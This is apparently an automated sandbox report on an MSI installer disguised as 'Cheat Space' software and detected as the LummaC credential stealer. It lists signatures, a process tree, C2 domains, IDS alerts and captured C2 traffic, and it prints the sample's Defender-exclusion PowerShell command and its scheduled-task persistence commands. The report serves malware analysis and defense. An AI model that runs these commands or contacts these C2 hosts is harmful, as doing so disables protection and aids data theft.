Edit tour

Windows Analysis Report
BpOyVCAP8g.msi

Overview

General Information

Sample Name:	BpOyVCAP8g.msi
Original Sample Name:	90598d1c212bc35849c863413566acd6.msi
Analysis ID:	1352650
MD5:	90598d1c212bc35849c863413566acd6
SHA1:	2249426c2283e4afd949b87849b8e24afd7a69d8
SHA256:	3fb30f154339640d180d3486573eb8133c0a61556adc6aa918c26a4e200dc90d
Tags:	msi
Infos:

Detection

LummaC Stealer

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected LummaC Stealer

Yara detected AntiVM3

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Found malware configuration

Multi AV Scanner detection for domain / URL

Query firmware table information (likely to detect VMs)

Executes Lua script

Drops large PE files

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking computer name)

Drops PE files to the application program directory (C:\ProgramData)

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

May check the online IP address of the machine

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 7304 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\BpOyVCAP8g.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7340 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7384 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F9CAFE3F9A48CCB4B30A0F2636E9E573 C MD5: 9D09DC1EDA745A5F87553048E57620CF)

LuaJIT.exe (PID: 8108 cmdline: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua MD5: 9C3C6C6A9AE84C33D6A09F4FB5E319CB)

msiexec.exe (PID: 7576 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D98E007001F77D35A61097C7682AE837 MD5: 9D09DC1EDA745A5F87553048E57620CF)

powershell.exe (PID: 7660 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1BB4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1BA1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1BA2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1BA3.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7792 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force } MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

msiexec.exe (PID: 7984 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding AD2F0FCC6D57BB9B2DA85CD9D490BCDB E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)

LuaJIT.exe (PID: 8024 cmdline: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua MD5: 9C3C6C6A9AE84C33D6A09F4FB5E319CB)

schtasks.exe (PID: 7888 cmdline: schtasks /create /sc daily /st 12:11 /f /tn BrowserHistoryCheck_NzI4 /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7812 cmdline: schtasks /create /sc daily /st 12:11 /f /tn "LuaJIT" /tr ""C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

pip.exe (PID: 1136 cmdline: C:\Users\user\AppData\Roaming\Python\pip.exe MD5: 10E79FCE9DAB731BA85B31A3F7C7EBA3)

RegSvcs.exe (PID: 7544 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 2212 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

WerFault.exe (PID: 6716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 1348 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NzI4.exe (PID: 7736 cmdline: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua MD5: 9C3C6C6A9AE84C33D6A09F4FB5E319CB)

LuaJIT.exe (PID: 1196 cmdline: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua MD5: 9C3C6C6A9AE84C33D6A09F4FB5E319CB)

LuaJIT.exe (PID: 8004 cmdline: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua MD5: 9C3C6C6A9AE84C33D6A09F4FB5E319CB)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["pokarisers.pw", "tirechinecarpett.pw", "musclefarelongea.pw", "fanlumpactiras.pwp", "ownerbuffersuperw.pw", "freckletropsao.pwp", "hemispheredonkkl.pw", "medicinebuckerrysa.pw"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000018.00000002.2881383590.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
00000016.00000002.2911728901.00000000048CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
00000016.00000002.2940934854.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
00000016.00000002.2909869210.00000000035D2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
00000016.00000002.2911728901.00000000049F4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: pip.exe PID: 1136	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: pip.exe PID: 1136	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 2212	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
24.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
24.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Snort Signatures

ETPRO TROJAN Lumma Stealer Related Activity - Source IP: 192.168.2.4 - Destination IP: 172.67.154.200

Timestamp:	192.168.2.4172.67.154.20049743802855505 12/03/23-17:24:06.953691
SID:	2855505
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In - Source IP: 192.168.2.4 - Destination IP: 172.67.154.200

Timestamp:	192.168.2.4172.67.154.20049743802048093 12/03/23-17:24:07.126616
SID:	2048093
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (tirechinecarpett .pw) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	192.168.2.41.1.1.149677532049418 12/03/23-17:24:06.683411
SID:	2049418
Source Port:	49677
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Lumma Stealer Related Activity - Source IP: 192.168.2.4 - Destination IP: 172.67.136.249

Timestamp:	192.168.2.4172.67.136.24949742802855505 12/03/23-17:24:06.155226
SID:	2855505
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://tirechinecarpett.pw:80/api	Avira URL Cloud: Label: malware
Source: http://tirechinecarpett.pw/	Avira URL Cloud: Label: malware
Source: http://tirechinecarpett.pw/apiO	Avira URL Cloud: Label: malware
Source: http://tirechinecarpett.pw/o	Avira URL Cloud: Label: malware
Source: http://tirechinecarpett.pw/apiuo	Avira URL Cloud: Label: malware
Source: http://tirechinecarpett.pw:80/apiw	Avira URL Cloud: Label: malware
Source: medicinebuckerrysa.pw	Avira URL Cloud: Label: malware
Source: http://tirechinecarpett.pw/?	Avira URL Cloud: Label: malware
Source: http://tirechinecarpett.pw/api	Avira URL Cloud: Label: malware
Source: tirechinecarpett.pw	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Python\pip.exe

Avira: detection malicious, Label: HEUR/AGEN.1332198

Found malware configuration

Source: 00000016.00000002.2940934854.0000000006F92000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["pokarisers.pw", "tirechinecarpett.pw", "musclefarelongea.pw", "fanlumpactiras.pwp", "ownerbuffersuperw.pw", "freckletropsao.pwp", "hemispheredonkkl.pw", "medicinebuckerrysa.pw"]}

Multi AV Scanner detection for domain / URL

Source: tirechinecarpett.pw	Virustotal: Detection: 21%	Perma Link
Source: ownerbuffersuperw.pw	Virustotal: Detection: 14%	Perma Link
Source: http://tirechinecarpett.pw/	Virustotal: Detection: 21%	Perma Link
Source: http://tirechinecarpett.pw:80/api	Virustotal: Detection: 22%	Perma Link
Source: hemispheredonkkl.pw	Virustotal: Detection: 12%	Perma Link
Source: musclefarelongea.pw	Virustotal: Detection: 15%	Perma Link
Source: http://tirechinecarpett.pw/o	Virustotal: Detection: 21%	Perma Link
Source: http://tirechinecarpett.pw:80/apiw	Virustotal: Detection: 14%	Perma Link
Source: tirechinecarpett.pw	Virustotal: Detection: 21%	Perma Link
Source: http://tirechinecarpett.pw/api	Virustotal: Detection: 22%	Perma Link

Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF3DD20 CryptReleaseContext,	22_2_6CF3DD20
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF3DEE0 CryptReleaseContext,	22_2_6CF3DEE0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF3DE00 CryptGenRandom,__CxxThrowException@8,	22_2_6CF3DE00
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF3D9D0 CryptAcquireContextA,GetLastError,	22_2_6CF3D9D0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF3DBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,	22_2_6CF3DBB0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF635E0 CryptReleaseContext,	22_2_6CF635E0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF3D7F0 CryptReleaseContext,	22_2_6CF3D7F0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF3D7D3 CryptReleaseContext,	22_2_6CF3D7D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 24_2_004432A0 _strlen,CryptStringToBinaryA,CryptStringToBinaryA,	24_2_004432A0

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49739 version: TLS 1.2

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: pip.exe, 00000016.00000002.2937354978.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, pip.exe, 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmp, pip.exe, 00000016.00000002.2911728901.0000000005194000.00000004.00000800.00020000.00000000.sdmp, pip.exe, 00000016.00000002.2911728901.00000000049F4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb\ source: BpOyVCAP8g.msi, 5d1856.msi.1.dr
Source:	Binary string: generally_accepted_standard_for_renewal.pdb source: pip.exe, 00000016.00000000.2836043607.0000000000C2E000.00000002.00000001.01000000.00000009.sdmp, pip.exe.9.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdbb source: BpOyVCAP8g.msi, 5d1856.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: BpOyVCAP8g.msi, 5d1856.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: BpOyVCAP8g.msi, 5d1856.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: pip.exe, 00000016.00000002.2911728901.00000000050C5000.00000004.00000800.00020000.00000000.sdmp, pip.exe, 00000016.00000002.2937354978.000000000676A000.00000004.08000000.00040000.00000000.sdmp, pip.exe, 00000016.00000002.2911728901.0000000005250000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: BpOyVCAP8g.msi, 5d1856.msi.1.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov eax, ebx		24_2_00401810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edx, eax		24_2_0040B5F0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855505 ETPRO TROJAN Lumma Stealer Related Activity 192.168.2.4:49742 -> 172.67.136.249:80
Source: Traffic	Snort IDS: 2049418 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (tirechinecarpett .pw) 192.168.2.4:49677 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2855505 ETPRO TROJAN Lumma Stealer Related Activity 192.168.2.4:49743 -> 172.67.154.200:80
Source: Traffic	Snort IDS: 2048093 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In 192.168.2.4:49743 -> 172.67.154.200:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: pokarisers.pw
Source: Malware configuration extractor	URLs: tirechinecarpett.pw
Source: Malware configuration extractor	URLs: musclefarelongea.pw
Source: Malware configuration extractor	URLs: fanlumpactiras.pwp
Source: Malware configuration extractor	URLs: ownerbuffersuperw.pw
Source: Malware configuration extractor	URLs: freckletropsao.pwp
Source: Malware configuration extractor	URLs: hemispheredonkkl.pw
Source: Malware configuration extractor	URLs: medicinebuckerrysa.pw

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pokarisers.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tirechinecarpett.pw
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=4HOolOafwCkK5gPKklWV6S.m_Bnjip9GaV4x1Mq2EKQ-1701620647-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: tirechinecarpett.pw

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: pip.exe.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: pip.exe.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: pip.exe.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: pip.exe.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000004.00000002.1742453910.00000000073EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micron?
Source: pip.exe.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: pip.exe.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: pip.exe.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: pip.exe.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: pip.exe.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: powershell.exe, 00000004.00000002.1740005463.0000000005CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1724939823.000000000602D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: pip.exe.9.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: pip.exe.9.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr, pip.exe.9.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: pip.exe.9.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000006.00000002.1722010880.0000000005116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pokarisers.pw/
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pokarisers.pw/VV
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pokarisers.pw/api
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pokarisers.pw/apieskg
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pokarisers.pw:80/apio
Source: powershell.exe, 00000006.00000002.1722010880.0000000005116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.1733130288.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722010880.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1722010880.0000000005116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tirechinecarpett.pw/
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tirechinecarpett.pw/?
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.2895356548.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tirechinecarpett.pw/api
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tirechinecarpett.pw/apiO
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tirechinecarpett.pw/apiuo
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tirechinecarpett.pw/o
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tirechinecarpett.pw:80/api
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tirechinecarpett.pw:80/apiw
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tirechinecarpett.pwG
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: powershell.exe, 00000006.00000002.1722010880.0000000005116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr, pip.exe.9.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000004.00000002.1733130288.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722010880.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBtq
Source: powershell.exe, 00000006.00000002.1724939823.000000000602D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1724939823.000000000602D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1724939823.000000000602D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1722010880.0000000005116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1733130288.0000000005039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
